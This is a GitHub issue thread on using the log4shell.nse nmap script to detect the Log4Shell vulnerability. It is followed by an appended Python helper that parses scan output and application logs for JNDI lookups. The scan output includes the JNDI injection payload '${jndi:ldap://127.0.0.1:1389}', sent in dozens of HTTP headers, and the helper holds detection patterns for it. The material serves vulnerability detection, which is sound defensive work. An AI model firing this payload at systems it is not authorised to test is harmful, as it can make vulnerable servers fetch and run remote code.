
nmap log4jshell.nse execution #4

Open
juanterio opened this issue Jan 5, 2022 · 3 comments
Comments

@juanterio

Hi,

First of all, thank you very much for this code. We are able to upload the NSE file in our NMAP.

Now the challenge we are facing right now is how to execute the scan. Based on the README.md, we just need to upload the nse file to our NMAP and do an update. However I am confused on the syntax:

nmap --script log4shell.nse [--script-args log4shell.callback-server=127.0.0.1:1389] [-p ]

  1. Is the callback server the NMAP server we are using?
  2. What is -p port for if we want to scan a server to see what ports are open and if vulnerable with log4j?
  3. Do I also need to download JNDIExploit.zip to our NMAP server so that the command will take effect?
  4. Do you have any sample result using this nse file?
@giterlizzi
Owner

Hi @juanterio,

Is the callback server the NMAP server we are using?

Not necessarily. The "callback server" is the IP address (and port) that is sent by the NSE script in the payload. You can use another server and listening port that are reachable by the target.

What is -p port for if we want to scan a server to see what ports are open and if vulnerable with log4j?

You can specify one or more ports using the -p argument or test the Well Known Port List without the -p argument.

Do I also need to download JNDIExploit.zip to our NMAP server so that the command will take effect?

You can use another service (LDAP server, ncat, netcat, etc.) listening and reachable by the target.

Do you have any sample result using this nse file?

In README.md you have a sample of NSE output.

NOTE

This script is useful to detect the Log4Shell vulnerability across the network, but requires a post-analysis. For example, if the target is protected by a firewall, by an IDS/IPS or a WAF, I suggest inspecting these logs to see if your application is vulnerable or if it's necessary to update or activate rules to protect the application.

Joseph

@juanterio
Author

Thanks @giterlizzi for the details!

We tested the script from one of our server with sample result below. How do we know if the server is vulnerable with log4j?

Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-06 10:24 China Standard Time
Nmap scan report for —removed—
Host is up (0.99s latency).
Not shown: 988 closed tcp ports (conn-refused)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1521/tcp open oracle
1720/tcp open h323q931
3389/tcp open ms-wbt-server
8009/tcp open ajp13
8080/tcp open http-proxy
| log4shell:
| Callback: 127.0.0.1:1389
| Payloads:
| ${jndi:ldap://127.0.0.1:1389}
| Test Method: HTTP
| URL Path: /
| HTTP Method: GET
| HTTP Headers:
| IPaddress: 200 OK
| Proxy-Authorization: 200 OK
| upgrade-insecure-requests: 200 OK
| Username: 200 OK
| X-Amz-Target: 200 OK
| User-Agent: 200 OK
| Authorization: 200 OK
| Max-Forwards: 200 OK
| X-Requested-With: 200 OK
| Accept-Encoding: 200 OK
| X-CSRF-Token: 200 OK
| Access-Control-Request-Headers: 200 OK
| Content-Type: 200 OK
| Pragma: 200 OK
| X-Amz-Date: 200 OK
| Expect: 417 Expectation Failed
| Referer: 200 OK
| Accept-Language: 200 OK
| Upgrade-Insecure-Requests: 200 OK
| Warning: 200 OK
| Content-Encoding: 200 OK
| TE: 200 OK
| Accept-Charset: 200 OK
| Origin: 200 OK
| Hostname: 200 OK
| IP: 200 OK
| X-Api-Version: 200 OK
| Accept-Datetime: 200 OK
| Content-Length: 500 Internal Server Error
| Range,: 200 OK
| Date: 200 OK
| Cookie: 200 OK
| Forwarded: 200 OK
| Dnt: 200 OK
| Content-Disposition: 200 OK
| Access-Control-Request-Method: 200 OK
| From: 200 OK
| Accept: 200 OK
|_ Note: (!) Inspect the callback server (127.0.0.1:1389) or web-application (—removed—:8080) logs
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 239.47 seconds

@giterlizzi
Owner

Inspect the application logs. If the application is vulnerable you can see a JNDI lookup in log:

2021-12-11 11:01:05,99 http-nio-8080-exec-1 WARN Error looking up JNDI resource [ldap://127.0.0.1/a]. javax.naming.CommunicationException: 127.0.0.1:389 [Root exception is java.net.ConnectException: Connection refused (Connection refused)]
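The two answers above describe a workflow: the NSE output alone is inconclusive (a "200 OK" per header only says the request was accepted), and the real signal is a JNDI lookup in the application log or a connection on the callback listener. The following script is an added example, not part of the log4shell.nse project, that automates that post-analysis: it parses the "log4shell:" block of an nmap report, flags headers with a non-2xx status for closer log review, and scans application log lines for the "Error looking up JNDI resource [...]" WARN line quoted in the last comment. The sample nmap excerpt and log lines are constructed from the ones pasted in this thread (with the target host replaced by a placeholder); the classification labels are this example's own, not the script's.

```python
"""Post-analysis helper for a log4shell.nse scan (added example, not project code)."""
import re
from typing import Dict, List

# Constructed excerpt of the nmap output pasted earlier in the thread (target host replaced).
SAMPLE_NMAP_OUTPUT = """\
8080/tcp open http-proxy
| log4shell:
| Callback: 127.0.0.1:1389
| Payloads:
| ${jndi:ldap://127.0.0.1:1389}
| Test Method: HTTP
| URL Path: /
| HTTP Method: GET
| HTTP Headers:
| User-Agent: 200 OK
| Expect: 417 Expectation Failed
| Content-Length: 500 Internal Server Error
|_ Note: (!) Inspect the callback server (127.0.0.1:1389) or web-application (target-host:8080) logs
"""

# Constructed application log lines; the first is the WARN line quoted by the maintainer.
SAMPLE_APP_LOG = [
    "2021-12-11 11:01:05,99 http-nio-8080-exec-1 WARN Error looking up JNDI resource "
    "[ldap://127.0.0.1/a]. javax.naming.CommunicationException: 127.0.0.1:389 "
    "[Root exception is java.net.ConnectException: Connection refused (Connection refused)]",
    "2021-12-11 11:01:06,12 http-nio-8080-exec-2 INFO GET / 200",
]

# "Header-Name: 200 OK" as printed inside the NSE "HTTP Headers:" section.
HEADER_RE = re.compile(r"^([A-Za-z0-9,\-]+):\s+(\d{3})\s+(.*)$")
# Log4j's warning when it actually tried to resolve the JNDI reference.
JNDI_LOOKUP_RE = re.compile(r"Error looking up JNDI resource \[([^\]]+)\]")
# The injected string logged verbatim (no lookup performed).
JNDI_PAYLOAD_RE = re.compile(r"\$\{jndi:[^}]*\}")


def parse_log4shell_report(text: str) -> Dict[str, object]:
    """Extract callback, payloads and per-header HTTP status from the NSE block."""
    report: Dict[str, object] = {"callback": None, "payloads": [], "headers": {}}
    in_payloads = in_headers = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line.startswith("|"):
            continue  # port table lines, not script output
        body = line.lstrip("|_").strip()
        if body.startswith("Callback:"):
            report["callback"] = body.split(":", 1)[1].strip()
        elif body == "Payloads:":
            in_payloads, in_headers = True, False
        elif body == "HTTP Headers:":
            in_payloads, in_headers = False, True
        elif body.startswith("Note:"):
            in_payloads = in_headers = False
        elif in_payloads and body.startswith("${jndi:"):
            report["payloads"].append(body)
        elif in_headers:
            m = HEADER_RE.match(body)
            if m:
                report["headers"][m.group(1)] = int(m.group(2))
    return report


def unusual_responses(report: Dict[str, object]) -> List[str]:
    """Headers whose injected request drew a non-2xx status.

    Only a prioritisation hint for log review: 200 does not mean safe and
    500 does not mean vulnerable; the application log decides.
    """
    return sorted(h for h, s in report["headers"].items() if not 200 <= s < 300)


def find_jndi_lookups(lines: List[str]) -> List[Dict[str, object]]:
    """Return log lines showing an attempted JNDI lookup or a logged payload string."""
    hits: List[Dict[str, object]] = []
    for n, line in enumerate(lines, 1):
        m = JNDI_LOOKUP_RE.search(line)
        if m:
            hits.append({"line": n, "kind": "lookup-attempted", "target": m.group(1)})
            continue
        m = JNDI_PAYLOAD_RE.search(line)
        if m:
            hits.append({"line": n, "kind": "payload-logged", "target": m.group(0)})
    return hits


def classify(report: Dict[str, object], log_hits: List[Dict[str, object]],
             callback_connection_seen: bool = False) -> str:
    """Combine scan, application log and callback-listener evidence (labels are this example's)."""
    if callback_connection_seen or any(h["kind"] == "lookup-attempted" for h in log_hits):
        return "vulnerable"            # the application resolved (or tried to resolve) the JNDI reference
    if any(h["kind"] == "payload-logged" for h in log_hits):
        return "payload-logged-no-lookup"  # string reached the logger but was not resolved; still review
    if report["headers"]:
        return "inconclusive"          # scan ran, no evidence either way yet
    return "not-tested"


if __name__ == "__main__":
    rep = parse_log4shell_report(SAMPLE_NMAP_OUTPUT)
    print("callback:", rep["callback"], "| review first:", unusual_responses(rep))
    hits = find_jndi_lookups(SAMPLE_APP_LOG)
    print("log evidence:", hits)
    print("verdict:", classify(rep, hits))
```

Feed it the full nmap report and the application's log file (one line per list entry) instead of the constructed samples; a "vulnerable" verdict means a JNDI lookup was observed, exactly the condition the maintainer describes, while "inconclusive" means only that the scan ran and the logs still need to be checked.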
